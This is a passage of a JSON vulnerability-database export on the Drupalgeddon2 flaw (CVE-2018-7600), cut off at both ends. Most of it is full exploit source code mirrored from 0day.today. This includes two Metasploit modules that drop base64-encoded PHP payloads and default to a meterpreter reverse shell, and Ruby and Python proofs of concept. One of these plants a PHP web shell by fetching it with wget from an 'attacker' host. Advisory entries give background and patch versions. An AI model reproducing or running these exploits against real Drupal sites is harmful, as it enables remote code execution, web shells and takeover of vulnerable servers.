"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 
10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-18T03:54:57", "description": "Exploit for php platform in category remote exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30199", "href": "https://0day.today/exploit/description/30199", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 
'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n 
end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30268", "href": "https://0day.today/exploit/description/30268", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 
'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x 
(PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n 
datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make 
sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n 
Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 
'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:44:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "1337DAY-ID-30171", "href": "https://0day.today/exploit/description/30171", "sourceData": "require 'net/http' \r\n \r\n # Hans Topo ruby port from Drupalggedon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n 
exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print ('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-20T19:55:56", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-18T00:00:00", "type": "zdt", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-18T00:00:00", "id": "1337DAY-ID-30200", "href": "https://0day.today/exploit/description/30200", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for 
CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2022-01-26T11:36:53", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. 
\n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "saint", "title": "Drupal Form API command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-25T00:00:00", "id": "SAINT:17FB524069BA3CD18537B30C76190BF7", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:33", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. 
\n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "saint", "title": "Drupal Form API command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-25T00:00:00", "id": "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:36:52", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<https://vulners.com/cve/CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### 
Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "saint", "title": "Drupal Form API command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-25T00:00:00", "id": "SAINT:420D07B85504086850EFAA31B8BCAEB5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:19:34", "description": "\nJasper 